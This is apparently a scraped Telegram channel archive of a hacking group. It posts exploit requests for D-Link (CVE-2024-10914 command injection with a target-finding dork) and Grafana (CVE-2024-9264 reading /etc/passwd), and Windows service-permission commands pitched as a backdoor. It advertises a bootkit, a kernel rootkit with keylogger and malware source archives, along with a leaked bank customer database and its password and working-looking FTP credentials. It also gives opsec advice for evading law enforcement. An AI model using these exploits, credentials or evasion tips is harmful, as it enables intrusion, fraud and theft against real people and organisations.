IMMORTAL$™ | UNCENSORED 👁
رفتن به کانال در Telegram
Banner: Seekers of the secret sauce. [immortal]# @ExpIoitd #blackhat #hacking #exploits #botnets #cve #0days #Zerodays #stealers #methods #leaks
نمایش بیشتر695
مشترکین
اطلاعاتی وجود ندارد24 ساعت
-17 روز
-830 روز
آرشیو پست ها
+1
CVE-2024-10914GET REQ:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27
Fofa Dork:
app="D_Link-DNS-ShareCenter"
CVE-2024-10914 has not been patched by D-Link.
Source: Link
#cve #vuln #exploitCVE-2024-9264
POST /api/ds/query?ds_type=expr&expression=true&requestId=Q100 HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Cookie: grafana_session=a739fa9aeb235f2790f17de00fefe528
Content-Length: 368
{
"from": "1696154400000",
"to": "1696345200000",
"queries": [
{
"datasource": {
"name": "Expression",
"type": "expr",
"uid": "expr"
},
"expression": "SELECT * FROM read_csv_auto('/etc/passwd');",
"hide": false,
"refId": "B",
"type": "sql",
"window": ""
}
]
}
#VULN #EXPLOITBanco Alfa 2023 [Complete]
This file contains a comprehensive collection of data from Banco Alfa, covering the period from 2004 to 2023. It includes detailed personal and financial information such as:
• Full names
• Dates of birth
• Credit card and bank account numbers
• Contact phone numbers
• Email addresses
Password to access the file:
G5ydUW>f*qbr8SRepost from 💀𝐌𝟒𝐧𝐮𝐩𝐢𝐥𝟓 (M4) Team | #𝕭𝖑𝖆𝖈𝖐𝕳𝖆𝖙𝕿𝖊𝖆𝖒
💠 Malware Source Codes
💠 Android
💠 Engine
💠 Java
💠 JavaScript
💠 Legacy Windows
💠 Libs
💠 Linux
💠 Msdos
💠 MacOs
💠 Php
💠 Panel
💠 Perl
💠 Phising pages
💠 Point of scales
💠 Python
💠 Ruby
💠 Win32
Repost from vadim | diary
additionally, dont forget to clean ur chats. As i know, if UAE does an EDR, Telegram would actually give out all of ur PM's, and supposedly all the messages youve sent in a group / channel.
Clean ur chats and ur messages from channels / groups.
Be careful
Repost from vadim | diary
As we know, telegram is becoming more stricter on cybercrime. My best advice for all of you out there is to be aware of your opsec, do investigations on yourself so that you know what's leaking and where.
From now on, the biggest thing you should be cautious about in your telegram profile, is the IP whenever u open telegram. And your phone number.
In this case, run telegram's traffic through tor, and avoid using your real phone number or any that leads back to you. to run telegram's traffic through tor, you need to run tor's daemon, or even the browser itself. Afterwards, you need to go to Settings > Advanced > Connection Type > Add proxy > Hostname: 127.0.0.1 > Port: 9050 (Tor's Daemon), Port: 9150 (Tor Browser) My best advice for the phone numbers is to, 1. While registering a new account, use a temp number. (smspool.net / sms-activate.io ) Afterwards, buy an anonymous number if you have the funds for it. (Cheapest bids go for 30$-200$ (fragment.com)). 2. You could be more risky and buy an temp-number. But doing so there is a risk that your number gets either banned, or someone else trying to log in. Privacy Based Messengers: - Element / Matrix (https://element.io/download) - Signal (https://signal.org/download/) - uTox (https://tox.chat/download.html) - Session (https://getsession.org/download)
Repost from ROOTKIT
Легальный и малозаметный LPE backdoor в WiNd0z
*
Разрешаем удаленное использование Services.msc
sc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)
sc.exe sdset scmanager D:(A;;KA;;;WD)
#win #backdoorRepost from ROOTKIT
CVE-2024-3400 Palo Alto GlobalProtect VPN (0-Day)
*
Тех детали - тут хорошо расписано
*
Сэмпл бэкдора - скачать тут (UPSTYLE Backdoor - update.py)
*
Аналитика от PaloAlto + адрсеса С2 серверов - можно глянуть тут
#paloalto #vpn #0day
BlackLotusBlackLotus: is an innovative UEFI Bootkit designed specifically for Windows. It incorporates a built-in Secure Boot bypass and Ring0/Kernel protection to safeguard against any attempts at removal. This software serves the purpose of functioning as an HTTP Loader. Thanks to its robust persistence, there is no necessity for frequent updates of the Agent with new encryption methods. Once deployed, traditional antivirus software will be incapable of scanning and eliminating it. The software comprises two primary components: the Agent, which is installed on the targeted device, and the Web Interface, utilized by administrators to manage the bots. In this context, a bot refers to a device equipped with the installed Agent.
- FeaturesHVCI bypass UAC bypass Secure Boot bypass BitLocker boot sequence bypass Windows Defender bypass (patch Windows Defender drivers in memory, and prevent Windows Defender usermode engine from scanning/uploading files) Dynamic hashed API calls (hell's gate) x86<=>x64 process injection API Hooking engine Anti-Hooking engine (for disabling, bypassing, and controlling EDRs) Modular plugin system
- DownloadsRepo: LINK Mitigation guid by NSA: LINK #rootkit #bootkit #malware #persistance #winmalware
Windows Kernel Rootkit in Rust (shadow-rs)
- ProcessProcess (Hide / Unhide) ✅ Process Signature (PP / PPL) ✅ Process Protection (Anti-Kill / Dumping) ✅ Elevate Process to System ✅ Terminate Process ✅ Lists protected and hidden processes currently on the system ✅
- ThreadThread (Hide / Unhide) ✅ Thread Protection (Anti-Kill) ✅ Lists protected and hidden threads currently on the system ✅
- DriverDriver (Hide / Unhide) ✅ Enumerate Driver ✅ Support for mapping the driver in memory ✅ Driver Signature Enforcement (DSE) DSE (Enable / Disable) ✅
- KeyloggerKeylogger (Start / Stop) ✅
- ModuleEnumerate Module ✅
- RegistryRegistry Protection (Anti-Deletion e Overwriting) ✅
- Injection ShellcodeProcess Injection (ZwCreateThreadEx) ✅ APC Injection ✅ Download: LINK Password: immortals #kernel #rootkit #kernelrootkits #malware #keylogger
Host: w011ab41.kasserver.com:21
Username: f013da2c
Password: Nv5pq3xuLYCc7zAh
#FreeFTP #Drops #FTP
Repost from RedBlueTM Hit
Offensive Internet of Things Exploitation
Info: attify-store.com/products/offensive-iot-exploitation
Password: @redbluehit
@Hide01 📰
@RedBlueHit 💀👀
@RedBlueTM 🔒
